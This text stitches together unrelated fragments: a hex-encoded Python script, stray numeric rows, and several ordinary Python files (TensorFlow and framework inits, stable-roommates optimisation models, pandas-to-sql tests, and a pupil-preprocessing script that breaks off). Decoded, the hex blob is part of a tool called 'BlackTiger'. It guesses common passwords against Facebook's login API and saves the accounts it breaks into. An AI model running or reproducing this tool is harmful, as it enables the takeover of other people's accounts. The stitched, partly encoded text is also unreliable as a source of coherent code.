202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A2020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737333290A2020202020202020202020202020202020202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020202020202020202020202020202020202070617373343D2250616B697374616E220A20202020202020202020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737334202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A20202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B207061737334200A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373342B275C6E27290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737334290A202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373340A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373342B275C6E27290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737334290A20202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202070617373353D22373836373836220A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737335202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373350A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373352B275C6E27290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737335290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B207061737335200A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373352B275C6E27290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737335290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0A0A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0A0A0A20202020202020206578636570743A0A202020202020202020202020706173730A20202020202020200A2020202070203D20546872656164506F6F6C283330290A20202020702E6D6170286D61696E2C206964290A202020207072696E742035302A20275C3033335B313B39316D2D270A202020207072696E742027426C61636B54696765722050726F6365737320486173204265656E20436F6D706C65746564E29688E29688E29688E29688E29688E29688E29692E29692E29692E296922E2E2E31303025270A202020207072696E742027546F74616C204F4B2F4350203A20272B737472286C656E286F6B7329292B272F272B737472286C656E2863706229290A202020207072696E742827426C61636B546967657220436C6F6E6564204163636F756E747320486173204265656E205361766564203A20736176652F636C6F6E65642E74787427290A202020206A616C616E28224E6F7465203A20596F757220426C61636B5469676572284350294163636F756E7473204F70656E206166746572203520746F2038206461797322290A202020207072696E742027270A202020207072696E74202222220A202020200A202020200A202020200A202020200A0A5C3033335B313B39316D5468616E6B73205C3033335B313B39376D557365696E67204D7920426C61636B546967657220546F6F6C0A5C3033335B313B39326D204D79205768617473617070204E6F5C3033335B313B39376D2B3932333033373333353131340A5C3033335B313B39336D4769744875625C3033335B313B39376D426C61636B54696765722D4572726F723430340A5C3033335B313B3934596F75547562655C3033335B313B39376DE2888654696D653420596F752222220A0A202020200A202020207261775F696E70757428225C6E5C3033335B313B39326D5B5C3033335B313B39326D4261636B5C3033335B313B39356D5D22290A202020206C6F67696E2829200A202020202020202020200A6966205F5F6E616D655F5F203D3D20275F5F6D61696E5F5F273A0A202020206C6F67696E28290A0A0A'))
| 12,575
| 37,710
| 0.999735
| 6
| 37,725
| 6,285.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.889746
| 0.00008
| 37,725
| 2
| 37,711
| 18,862.5
| 0.110068
| 0
| 0
| 0
| 0
| 0
| 0.998913
| 0.998913
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
0c339e303e81938df230a1a93f38a3009926afbc
| 114
|
py
|
Python
|
IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | 1
|
2020-08-27T07:57:02.000Z
|
2020-08-27T07:57:02.000Z
|
build/lib/IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | null | null | null |
build/lib/IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | null | null | null |
from .app import App
from .resolve import resolve_obj
def get_app(resolver=resolve_obj):
return App(resolver)
| 22.8
| 34
| 0.789474
| 18
| 114
| 4.833333
| 0.5
| 0.229885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 114
| 5
| 35
| 22.8
| 0.887755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a752e31fab4e5418938671fd51350ad39c3df32a
| 1,155
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Functions for Python 2 vs. 3 compatibility.
## Conversion routines
In addition to the functions below, `as_str` converts an object to a `str`.
## Types
The compatibility module also provides the following types:
* `bytes_or_text_types`
* `complex_types`
* `integral_types`
* `real_types`
"""
from __future__ import print_function
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.compat.compat import forward_compatible
from tensorflow.python.util.compat import as_bytes
from tensorflow.python.util.compat import as_str
from tensorflow.python.util.compat import as_str as as_text
from tensorflow.python.util.compat import as_str_any
from tensorflow.python.util.compat import bytes_or_text_types
from tensorflow.python.util.compat import complex_types
from tensorflow.python.util.compat import integral_types
from tensorflow.python.util.compat import path_to_str
from tensorflow.python.util.compat import real_types
del print_function
| 33.970588
| 83
| 0.805195
| 166
| 1,155
| 5.409639
| 0.361446
| 0.213808
| 0.244989
| 0.240535
| 0.5
| 0.5
| 0.459911
| 0.136971
| 0
| 0
| 0
| 0.001988
| 0.129004
| 1,155
| 33
| 84
| 35
| 0.890656
| 0.361905
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.923077
| 0
| 0.923077
| 0.153846
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a75591b3d3dc8f9fc7200a49b52ecbe39f78c5df
| 241
|
py
|
Python
|
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
] | null | null | null |
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
] | null | null | null |
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
] | 1
|
2021-08-29T09:32:12.000Z
|
2021-08-29T09:32:12.000Z
|
import random
def generate_random_int_range(max_range=1, min_range=0):
return random.randint(min_range, max_range)
def generate_random_range(min_range=-1, max_range=1):
return random.random() * (max_range - min_range) + min_range
| 26.777778
| 64
| 0.771784
| 39
| 241
| 4.410256
| 0.307692
| 0.232558
| 0.226744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018957
| 0.124481
| 241
| 9
| 64
| 26.777778
| 0.796209
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a75fd2445a76915f2077916483b909fc6ba27f45
| 4,873
|
py
|
Python
|
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
import gurobipy as gp
from gurobipy import GRB
from random import shuffle
import statistics
import warnings
import sys
import time
import networkx as nx
def generate_instance(num_agents):
instance=[]
for i in range(num_agents):
pref = [x for x in range(num_agents) if x != i]
shuffle(pref)
instance.append(pref)
return instance
#Only works for even number of agents
def swap_distance_to_stable(instance):
num_agents=len(instance)
m = gp.Model("mip1")
m.setParam('OutputFlag', False)
#who is matched to whom
x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
#am I matched to rank i or better
gm = m.addVars(num_agents, num_agents-1, lb=0, ub=1, vtype=GRB.BINARY)
#by how much have my partner been swaped up in my preferences
yy = m.addVars(num_agents, lb=0, ub=num_agents, vtype=GRB.INTEGER)
for i in range(num_agents):
yy[i].start=0
opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents*num_agents)
m.addConstr(gp.quicksum(yy[i] for i in range(num_agents)) == opt)
for i in range(num_agents):
m.addConstr(x[i, i] == 0)
for i in range(num_agents):
for j in range(num_agents):
m.addConstr(x[i, j] == x[j, i])
for i in range(num_agents):
for j in range(num_agents):
if i!=j:
for t in range(num_agents-1):
m.addConstr(x[i, j]*instance[i].index(j) <= t+yy[i]+num_agents*(1-gm[i,t]))
for i in range(num_agents):
m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) == 1)
for i in range(num_agents):
for j in range(i+1,num_agents):
m.addConstr(gm[i,instance[i].index(j)]+gm[j,instance[j].index(i)]>=1)
m.setObjective(opt, GRB.MINIMIZE)
m.optimize()
return int(m.objVal)
def delete_distance_to_stable(instance):
num_agents=len(instance)
m = gp.Model("mip1")
m.setParam('OutputFlag', False)
x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
y = m.addVars(num_agents, lb=0, ub=1, vtype=GRB.BINARY)
for i in range(num_agents):
y[i].start=0
opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents)
m.addConstr(gp.quicksum(y[i] for i in range(num_agents)) == opt)
for i in range(num_agents):
m.addConstr(x[i, i] == 0)
for i in range(num_agents):
for j in range(num_agents):
m.addConstr(x[i, j] == x[j, i])
for i in range(num_agents):
m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) <= (1-y[i]))
for i in range(num_agents):
for j in range(i+1,num_agents):
better_pairs=[]
for t in range(0,instance[i].index(j)+1):
better_pairs.append([i,instance[i][t]])
for t in range(0,instance[j].index(i)+1):
better_pairs.append([j,instance[j][t]])
m.addConstr(gp.quicksum(x[a[0], a[1]] for a in better_pairs) >= 1-y[i]-y[j])
m.setObjective(opt, GRB.MINIMIZE)
m.optimize()
matching={}
for i in range(num_agents):
for j in range(num_agents):
if x[i, j].X == 1:
matching[i]=j
matching[j]=i
return int(m.objVal)
def min_num_blocking_agents_matching(instance):
num_agents=len(instance)
m = gp.Model("mip1")
m.setParam('OutputFlag', False)
x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
y = m.addVars(num_agents, lb=0, ub=1, vtype=GRB.BINARY)
for i in range(num_agents):
y[i].start=0
opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents)
m.addConstr(gp.quicksum(y[i] for i in range(num_agents)) <= opt)
for i in range(num_agents):
m.addConstr(x[i, i] == 0)
for i in range(num_agents):
for j in range(num_agents):
m.addConstr(x[i, j] == x[j, i])
for i in range(num_agents):
m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) <= 1)
for i in range(num_agents):
for j in range(i+1,num_agents):
better_pairs=[]
for t in range(0,instance[i].index(j)+1):
better_pairs.append([i,instance[i][t]])
for t in range(0,instance[j].index(i)+1):
better_pairs.append([j,instance[j][t]])
m.addConstr(gp.quicksum(x[a[0], a[1]] for a in better_pairs) >= 1-y[i]-y[j])
m.setObjective(opt, GRB.MINIMIZE)
m.optimize()
matching={}
for i in range(num_agents):
for j in range(num_agents):
if x[i, j].X == 1:
matching[i]=j
matching[j]=i
print(m.objVal)
return int(m.objVal)
#for i in range(100):
# instance=generate_instance(50)
# print(min_num_blocking_agents_matching(instance))
# print(swap_distance_to_stable(instance))
# print(delete_distance_to_stable(instance))
| 34.807143
| 96
| 0.605992
| 818
| 4,873
| 3.503667
| 0.116137
| 0.178995
| 0.115143
| 0.184229
| 0.818911
| 0.762736
| 0.707258
| 0.673064
| 0.672715
| 0.672715
| 0
| 0.015326
| 0.250154
| 4,873
| 139
| 97
| 35.057554
| 0.76902
| 0.071209
| 0
| 0.716814
| 1
| 0
| 0.009298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035398
| false
| 0
| 0.070796
| 0
| 0.141593
| 0.00885
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7b8c7bf3d5b15819d951d1005de600a8d14a489
| 1,423
|
py
|
Python
|
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | 18
|
2021-01-21T17:10:29.000Z
|
2022-03-30T19:48:00.000Z
|
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | null | null | null |
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | null | null | null |
import pytest
from pandas_to_sql.testing.utils.asserters import assert_
from pandas_to_sql.conventions import flatten_grouped_dataframe
from copy import copy
def test_merge_inner():
df = pytest.df1
df2 = copy(df)
df2['random_int_plus_3'] = df2.random_int + 3
df2 = df2[df2.random_int < 3]
df2 = df2[['random_int_plus_3','random_str']]
df3 = df.merge(df2, on='random_str', how='inner')
assert_(df3)
def test_merge_left():
df = pytest.df1
df2 = copy(df)
df2['random_int_plus_3'] = df2.random_int + 3
df2 = df2[df2.random_int < 3]
df2 = df2[['random_int_plus_3','random_str']]
df3 = df.merge(df2, on='random_str', how='left')
assert_(df3)
def test_merge_left_on_right_on_how_inner():
df = pytest.df1
df2 = copy(df)
df2['random_int_plus_3'] = df2.random_int + 3
df2['random_str_2'] = df2.random_str
df2 = df2[df2.random_int < 3]
df2 = df2[['random_int_plus_3','random_str_2']]
df3 = df.merge(df2, left_on='random_str', right_on='random_str_2', how='inner')
assert_(df3)
def test_merge_left_on_right_on_how_left():
df = pytest.df1
df2 = copy(df)
df2['random_int_plus_3'] = df2.random_int + 3
df2['random_str_2'] = df2.random_str
df2 = df2[df2.random_int < 3]
df2 = df2[['random_int_plus_3','random_str_2']]
df3 = df.merge(df2, left_on='random_str', right_on='random_str_2', how='left')
assert_(df3)
| 29.645833
| 83
| 0.677442
| 238
| 1,423
| 3.693277
| 0.138655
| 0.204778
| 0.21843
| 0.14562
| 0.8157
| 0.8157
| 0.8157
| 0.8157
| 0.780432
| 0.780432
| 0
| 0.063574
| 0.18201
| 1,423
| 47
| 84
| 30.276596
| 0.691581
| 0
| 0
| 0.684211
| 0
| 0
| 0.201125
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7dcc424174ac504b2a757e1026cd120f81cb347
| 84
|
py
|
Python
|
tests/test_norfair.py
|
pdd-999/norfair
|
83ff3fdae973707d8fc569d270e15badbe4a4619
|
[
"BSD-3-Clause"
] | 1,354
|
2020-09-11T12:04:08.000Z
|
2022-03-30T09:50:25.000Z
|
tests/test_norfair.py
|
Uzarel/norfair
|
1e35cb311b32827030a147e6e9ce4528343e51ca
|
[
"BSD-3-Clause"
] | 67
|
2020-09-14T16:06:13.000Z
|
2022-03-29T19:30:50.000Z
|
tests/test_norfair.py
|
Uzarel/norfair
|
1e35cb311b32827030a147e6e9ce4528343e51ca
|
[
"BSD-3-Clause"
] | 125
|
2020-09-11T19:32:02.000Z
|
2022-03-30T09:50:13.000Z
|
import norfair
def test_norfair():
# TODO: write actual tests
assert True
| 12
| 30
| 0.690476
| 11
| 84
| 5.181818
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 84
| 6
| 31
| 14
| 0.904762
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a7dd8372061181241e3efb6815cb478136676987
| 57,402
|
py
|
Python
|
analysis/irf_task/first_level_irf.py
|
colizoli/belief_state_model
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | 3
|
2018-03-04T18:18:25.000Z
|
2018-03-08T11:51:22.000Z
|
analysis/irf_task/first_level_irf.py
|
colizoli/pupil_belief_states
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | null | null | null |
analysis/irf_task/first_level_irf.py
|
colizoli/pupil_belief_states
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
first_level_irf.py
If used, please cite:
Colizoli, O., de Gee, J. W., Urai, A. E. & Donner, T. H.
Task-evoked pupil responses reflect internal belief states. Scientific Reports 8, 13702 (2018).
"""
import os, sys, datetime
import subprocess, logging
import scipy as sp
import scipy.stats as stats
import numpy as np
import matplotlib.pylab as pl
from IPython import embed as shell
this_raw_folder = '/home/raw/'
this_project_folder = '/home/measure_irf'
analysisFolder = os.path.join(this_project_folder, 'analysis')
sys.path.append( analysisFolder )
sys.path.append( os.environ['ANALYSIS_HOME'] )
from Tools.Sessions import *
from Tools.Run import *
import pupil_preprocessing_irf
subjects = ['sub-01', 'sub-02', 'sub-03', 'sub-04', 'sub-05', 'sub-06', 'sub-07', 'sub-08', 'sub-09', 'sub-10', 'sub-11', 'sub-12', 'sub-13', 'sub-14', 'sub-15']
for which_subject in subjects:
sessions = [1,2,3,4]
if which_subject == 'sub-14' or which_subject == 'sub-15':
sessions = [2,3,4]
if which_subject == 'sub-02':
sessions = [1,2,3]
edfs = []
for s in sessions:
def runWholeSession( rDA, session ):
for r in rDA:
thisRun = Run( **r )
presentSession.addRun(thisRun)
session.parcelateConditions()
session.parallelize = True
# initialize pupil session:
global edfs
edfs.append( [rDA[i]['eyeLinkFilePath'] for i in range(len(rDA)) if rDA[i]['condition'] == 'task'] )
if (which_subject=='sub-02' and s == 3) or (which_subject != 'sub-02' and s==4): # if last session
edfs = list(np.concatenate(edfs))
aliases = []
for i in range(len(edfs)):
session = int(edfs[i].split('_s')[1][0])
aliases.append('measureIRF_{}_{}'.format(i+1, session))
print aliases
subject = Subject(which_subject, '?', None, None, None)
experiment = 1
version = 2
# preprocessing:
pupilPreprocessSession = pupil_preprocessing_irf.pupilPreprocessSession(subject=subject, experiment_name='pupil_measureIRF', experiment_nr=experiment, version=version, sample_rate_new=50, project_directory=this_project_folder)
pupilPreprocessSession.import_raw_data(edf_files=edfs, aliases=aliases)
pupilPreprocessSession.convert_edfs(aliases)
# pupilPreprocessSession.delete_hdf5() # run if need to replace HDF5 files
## Run MATLAB code here (MeasureIRF_MSG_FindReplace.m)
pupilPreprocessSession.import_all_data(aliases)
for alias in aliases:
pupilPreprocessSession.process_runs(alias, artifact_rejection='not_strict', create_pupil_BOLD_regressor=False)
# pass
pupilPreprocessSession.process_across_runs(aliases, create_pupil_BOLD_regressor=False)
## missing first trials, and last pupil_cd for each participant!?
# for testing;
if __name__ == '__main__':
########################################################################################################################################################################################################
if which_subject == 'sub-01':
# subject information
initials = 'sub-01'
firstName = 'sub-01'
standardFSID = 'sub-01_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 9)
sj_session1 = 'sub-01_091115'
if s == 2:
sessionDate = datetime.date(2015, 11, 16)
sj_session2 = 'sub-01_161115'
if s == 3:
sessionDate = datetime.date(2015, 11, 27)
sj_session3 = 'sub-01_271115'
if s == 4:
sessionDate = datetime.date(2015, 12, 04)
sj_session4 = 'sub-01_041215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
